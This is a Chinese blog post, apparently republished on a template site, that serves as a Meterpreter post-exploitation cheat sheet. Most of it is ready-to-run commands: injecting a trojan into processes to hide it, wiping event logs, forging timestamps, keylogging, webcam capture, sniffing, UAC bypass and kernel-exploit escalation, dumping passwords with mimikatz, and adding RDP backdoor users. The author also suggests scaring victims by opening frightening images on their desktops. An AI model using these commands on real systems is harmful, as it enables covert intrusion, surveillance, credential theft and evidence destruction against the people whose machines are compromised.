【内网安全】——meterpreter使用攻略

这篇具有很好参考价值的文章主要介绍了【内网安全】——meterpreter使用攻略。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

作者名:白昼安全
主页面链接: 主页传送门
创作初心: 一切为了她
座右铭: 不要让时代的悲哀成为你的悲哀
专研方向: web安全,后渗透技术
每日emo: 再给我一年,好吗?
【内网安全】——meterpreter使用攻略

Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。

一、系统命令

1、基本系统命令

sessions  # 列出后台所有的会话
sessions –h 查看帮助
sessions -i <ID值>  #进入指定会话   
sessions -k  杀死指定会话
background  #将当前会话放置后台
run  #执行已有的模块,输入run后按两下tab,列出已有的脚本
info #查看已有模块信息
getuid # 查看权限 
getpid # 获取当前进程的pid
sysinfo # 查看目标机系统信息
ps # 查看当前活跃进程    kill <PID值> 杀死进程
idletime #查看目标机闲置时间
reboot(linux) / shutdown(windows)   #重启/关机
shell #进入目标机cmd shell

这些命令主要用于才拿到权限时,相当于对当前机器进行一个简单初步的信息收集,其中比较重要的就是ps命令,可以查看到当前的活跃进程,如下

【内网安全】——meterpreter使用攻略

方便我们选择一个进程进行注入,让我们的木马更隐蔽

2、uictl开关键盘/鼠标

uictl [enable/disable] [keyboard/mouse/all]  #开启或禁止键盘/鼠标
uictl disable mouse  #禁用鼠标
uictl disable keyboard  #禁用键盘
【内网安全】——meterpreter使用攻略

但是这个功能的条件很苛刻,linux我试了很多版本,例如centos,kali这些都不行,而且我的三台win10都不行,提示需要win32版本的系统

我认为可能只有win32版本的系统才支持这个功能,我电脑上并没有win32版本的虚拟机,欢迎有条件的兄弟们下去试试,如果能把结果告诉我就更好了哈哈

3、webcam摄像头命令

webcam_list  #查看是否存在摄像头
webcam_snap   #通过摄像头拍照,在kali桌面生成拍摄后的图片文件
webcam_stream   #通过摄像头开启视,在kali桌面生成html文件,文件内容为实时视频
【内网安全】——meterpreter使用攻略

使用的时候首先要使用webcam_list查看当前机器是否有摄像头,有摄像头才能进行拍照,视频等操作

4、execute执行文件

execute #在目标机中执行文件

例:execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
【内网安全】——meterpreter使用攻略

可以去执行目标的可执行文件

注意:如果我们想实现打开目标文件上的文本文件,例如目标桌面上有一个a.txt文件,此时我们时system权限,直接在shell命令下执行a.txt会报错,因为system权限是没有会话的,需要降低为普通用户权限,再进入shell命令下执行a.txt,此时目标电脑上才会直接打开a.txt文件

5、migrate进程迁移

getpid    # 获取当前进程的pid
ps   # 查看当前活跃进程
migrate <pid值>    #将Meterpreter会话移植到指定pid值进程中,也就是进程注入
kill <pid值>   #杀死指定进程

进程注入也就是将木马绑定到进程中,此时就查不出来木马文件,而且注入之后原来的木马程序就算被删除了也没关系,只要进程还在,我们的权限就一直在,非常之好用

6、clearav清除日志

clearav  #清除windows中的应用程序日志、系统日志、安全日志

一般痕迹清理时用这个就够了,效果还可以

二、文件系统命令

1、基本文件系统命令

getwd 或者pwd # 查看当前工作目录  
ls
cd
search -f "filename"       # 搜索指定文件  -h查看帮助
cat c:\\lltest\\lltestpasswd.txt  # 查看文件内容
upload /tmp/hack.txt C:\\lltest  # 上传文件到目标机上,第一个参数是要上传的文件路径,第二个是目标
download c:\\lltest\\lltestpasswd.txt /tmp/ # 下载文件到本机上,第一个是要下载位置,第二个是存放位置
edit c:\\1.txt #编辑或创建文件  没有的话,会新建文件
rm C:\\lltest\\hack.txt  #删除指定文件
mkdir lltest2  #只能在当前目录下创建文件夹
rmdir lltest2  #只能删除当前目录下文件夹
getlwd   或者 lpwd   #操作攻击者主机 查看当前目录
lcd /tmp   #操作攻击者主机 切换目录位置

这个一种比较帅的方法是上传一些美好(kongbu)的图片用upload传到它的桌面,在进入shell权限下给他打开,就能实现控制它电脑打开美好(kongbu)的图片,给他个惊喜

2、timestomp伪造时间戳

timestomp C:// -h   #查看帮助
timestomp -v C://2.txt   #查看时间戳
timestomp C://2.txt -f C://1.txt #将1.txt的时间戳复制给2.txt
时间戳是自 1970 年 1 月 1 日(00:00:00 )至当前时间的总秒数。它也被称为 Unix 时间戳(Unix Timestamp),Unix时间戳不仅被使用在Unix系统、类Unix系统中(比如 Linux系统),也在许多其他 操作系统中被广泛采用。
【内网安全】——meterpreter使用攻略

主要是可以查一手文件的创建或者说修改时间

【内网安全】——meterpreter使用攻略

三、网络命令

1、基本网络命令

ipconfig(windows)/ifconfig(linux)
netstat –ano
arp
getproxy   #查看代理信息
route   #查看路由

这些命令基本是做内网渗透的时候用的比较多,一般是进入目标机器后,探测目标所处的一个网络环境,公司,学校之类的环境

2、portfwd端口转发

portfwd add -l 6666 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地6666端口

这样就安全多了,不会出现传输过程中造成的安全隐患

还有一种想法就是各种外连,比如ssh,ftp之类的,例如把我们已经控制好的linux的22端口转发到本地的6666端口,再使用linux的远程连接工具rdesktop连接本地的6666端口就可以把实现远程登录

3、autoroute添加路由

run autoroute –h #查看帮助
run autoroute -s 192.168.159.0/24  #添加到目标环境网络
run autoroute –p  #查看添加的路由

路由信息设置一般配合着msf自己的代理设置模板auxiliary/server/socks_proxy,进行内网的一个攻占据点的操作,我的这篇打靶博客文章中也有用到这种手法,有兴趣的同学们可以看看,链接如下

http://t.csdn.cn/g3KV3

然后还可以利用arp_scanner、portscan等模块进行扫描

run post/windows/gather/arp_scanner RHOSTS=192.168.159.0/24
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.159.144 PORTS=3389
【内网安全】——meterpreter使用攻略

四、信息收集

信息收集的脚本位于:

/usr/share/metasploit-framework/modules/post/windows/gather
/usr/share/metasploit-framework/modules/post/linux/gather
【内网安全】——meterpreter使用攻略

信息收集的脚本较多,仅列几个常用的:

run post/windows/gather/checkvm #是否虚拟机
run post/linux/gather/checkvm #是否虚拟机
run post/windows/gather/forensics/enum_drives #查看分区
run post/windows/gather/enum_applications #获取安装软件信息
run post/windows/gather/dumplinks   #获取最近的文件操作
run post/windows/gather/enum_ie  #获取IE缓存
run post/windows/gather/enum_chrome   #获取Chrome缓存
run post/windows/gather/enum_patches  #补丁信息
run post/windows/gather/enum_domain  #查找域控

五、提权手法

1、getsystem提权

getsystem

getsystem工作原理

①getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管道。

②getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。

③Windows服务已启动,导致与命名管道建立连接。

④该进程接收连接并调用ImpersonateNamedPipeClient,从而为SYSTEM用户创建模拟令牌。
然后用新收集的SYSTEM模拟令牌产生cmd.exe,并且我们有一个SYSTEM特权进程。
【内网安全】——meterpreter使用攻略

2、bypassuac

内置多个bypassuac脚本,原理有所不同,使用方法类似,运行后返回一个新的会话,需要再次执行getsystem获取系统权限,如:

use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
use windows/local/bypassuac_vbs
use windows/local/ask

如何使用bypassuac.rb脚本:

msf > use exploit/windows/local/bypassuac
msf > set SESSION 2
msf > run
【内网安全】——meterpreter使用攻略

3、内核漏洞提权

可先利用enum_patches模块 收集补丁信息,然后查找可用的exploits进行提权

meterpreter > run post/windows/gather/enum_patches  #查看补丁信息
msf > use exploit/windows/local/ms13_053_schlamperei
msf > set SESSION 2
msf > exploit
【内网安全】——meterpreter使用攻略

六、kiwi抓取密码

mimikatz模块用于抓取密码,但是新版本中mimikatz模块已经合并为kiwi模块;使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。

kiwi_cmd 模块可以让我们使用mimikatz的全部功能,该命令后面接 mimikatz.exe 的全部命令:

load kiwi    #help mimikatz 查看帮助

例如:kiwi_cmd sekurlsa::logonpasswords
【内网安全】——meterpreter使用攻略

七、远程桌面&截屏

enumdesktops  #查看可用的桌面
getdesktop    #获取当前meterpreter 关联的桌面
set_desktop   #设置meterpreter关联的桌面  -h查看帮助
screenshot  #截屏
use espia  #或者使用espia模块截屏  然后输入screengrab
run vnc  #使用vnc远程桌面连接

这个功能怎么说呢?非常帅,而且很好用

【内网安全】——meterpreter使用攻略
【内网安全】——meterpreter使用攻略

八、开启rdp&添加用户

1、getgui命令

run getgui –h #查看帮助
run getgui -e #开启远程桌面
run getgui -u lltest2 -p 123456   #添加用户
run getgui -f 6661 –e   #3389端口转发到6661

getgui 这个命令我只能说捞得一,经常会报系统不推荐,但有的时候也能用,具体的使用条件我也没研究清楚,如果使用错误报错可以试试使用下面这个

run post/windows/manage/enable_rdp

getgui添加用户时,有时虽然可以成功添加用户,但是没有权限通过远程桌面登陆,也比较鸡肋

2、enable_rdp脚本

run post/windows/manage/enable_rdp  #开启远程桌面
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用户,名为www2,密为123456
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662  #将3389端口转发到6662

这个就是上面的getgui命令的替代品,会更好用一点

脚本位于/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb
通过enable_rdp.rb脚本可知:开启rdp是通过reg修改注册表;添加用户是调用cmd.exe 通过net user添加;端口转发是利用的portfwd命令
【内网安全】——meterpreter使用攻略
【内网安全】——meterpreter使用攻略

九、键盘记录

keyscan_start  #开始键盘记录
keyscan_dump   #导出记录数据
keyscan_stop #结束键盘记录
【内网安全】——meterpreter使用攻略

这个命令也很有意思,目前我测试了一下,win10没有问题,x64位的linux系统不支持文章来源地址https://www.toymoban.com/news/detail-453176.html

注意:这里的导出键盘记录,需要在结束键盘记录前使用,结束之后就无法导出键盘记录了

十、sniffer抓包

use sniffer
sniffer_interfaces   #查看网卡
sniffer_start 2   #选择网卡 开始抓包
sniffer_stats 2   #查看状态
sniffer_dump 2 /tmp/lltest.pcap  #导出pcap数据包
sniffer_stop 2   #停止抓包
【内网安全】——meterpreter使用攻略

到了这里,关于【内网安全】——meterpreter使用攻略的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 掌握内网渗透之道,成为实战高手,看《内网渗透实战攻略》就够了

    当今,网络系统面临着越来越严峻的安全挑战。在众多的安全挑战中,一种有组织、有特定目标、长时间持续的新型网络攻击日益猖獗,国际上常称之为APT(Advanced Persistent Threat,高级持续性威胁)攻击。传统的渗透测试从外网发起攻击,并以攻破单台主机为目标。与之相比

    2024年02月02日
    浏览(41)
  • 一键搞定!黑群晖虚拟机+内网穿透实现校园公网访问攻略!

    对于热爱学习的在校大学生 研究生来说,从网上找学习资源容易,如何存储下来还能随时随地使用始终是个难题。 随着固态硬盘价格下降,研究生小张买了一块2T SSD装到电脑上用来存储学习资源,但是每次要背着笔记本去图书馆学习不方便,小张想用iPad在图书馆使用校园

    2024年02月07日
    浏览(44)
  • 如何使用Kali Linux进行内网或局域网安全演练?

    本节课你将了解到如何使用ARP欺骗窃取局域网用户相关账户密玛,内容包括: 1、如何开启IP转发 2、怎样窃取受害用户相关账号密玛 一、如何开启IP转发 在之前的截取受害者电脑图片流量的课程中,我们也讲过了要开启IP转发以及如何开启,开启IP转发使受害者电脑能够正常

    2024年02月02日
    浏览(50)
  • 好用的ai网站白昼降临gtp4对话midjourney绘图机器人写小说

    白昼降临使用地址:ai人工智能白昼降临 AI对话有很多不同的功能,以下是一些常见的功能: 智能对话:AI对话可以进行自然语言交互,回答用户的问题,解决用户的疑惑。它可以提供相关的信息、指导和建议。 语言翻译:AI对话可以进行语言翻译,将一种语言翻译成另一种

    2024年02月20日
    浏览(45)
  • AI之Sora:Sora(文本指令生成视频的里程碑模型)的简介(能力/安全性/技术细节)、使用方法、案例应用之详细攻略

    AI之Sora:Sora(文本指令生成视频的里程碑模型)的简介(能力/安全性/技术细节)、使用方法、案例应用之详细攻略 导读 :Sora 是OpenAI研发的一个可以 根据文字描述生成视频 的AI模型。它的主要特性、功能以及OpenAI在安全和应用方面的策略的核心要点如下所示: 核心功能 Sora可以

    2024年02月21日
    浏览(51)
  • Android Termux安装MySQL,并使用cpolar实现公网安全远程连接[内网穿透]

    Android作为移动设备,尽管最初并非设计为服务器,但是随着技术的进步我们可以将Android配置为生产力工具,变成一个随身Linux。 MariaDB是MySQL关系数据库管理系统的一个复刻,由社区开发,有商业支持,旨在继续保持在 GNU GPL 下开源。开发这个分支的原因之一是:甲骨文公司

    2024年02月08日
    浏览(61)
  • meterpreter后渗透攻击

    msf提供了非常强大的后渗透工具-meterpreter.获取目标机的meterpreter后有以下优势 纯内存工作模式 加密通信协议,而且同时与几个通道通信 攻击进程内工作,多进程内迁移 平台互通 通过浏览器的shell可能是一个脆弱的shell,将shell和一个稳定的进程绑定到一起,就不需要对磁盘进行任

    2023年04月15日
    浏览(38)
  • 详尽的msf——meterpreter——渗透测试教程

    本文仅供学习参考使用,切勿用于非法事情!! 众所周知,msf是大家公认的神器,年少不知msf香,总想自己写程序。 现在发现msf很厉害,可以在它的基础上开发。 msf是框架,什么意思呢,用它可以做渗透攻击的一整套流程,包括前期探索(发育),中期攻击(开团),后期

    2023年04月15日
    浏览(45)
  • 等保三级安全要求简要攻略-安全计算环境

    今天我们来攻略一下等保2.0国家标准中 《信息安全技术网络安全等级保护基本要求》 所对三级系统所提出的要求项以及针对这些要求项如何去应对或者说是如何去做防护。废话不多说直接上正题 在等保三级中分为十个大项分别是:安全物理环境、安全通信网络、安全区域边

    2024年02月10日
    浏览(40)
  • 等保三级安全要求简要攻略-安全物理环境

    之前有两篇文章写了为什么要做等保测评、等保测评的含义以及等保测评这份工作的一些职责和一些常见的FAQ,没有看过的朋友可以先去看下我的另外两篇文章:一起聊聊等保测评 和 一起聊聊等保测评工作内容以及FAQ 。 今天我们来攻略一下等保2.0国家标准中《 信息安全技

    2024年02月01日
    浏览(43)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包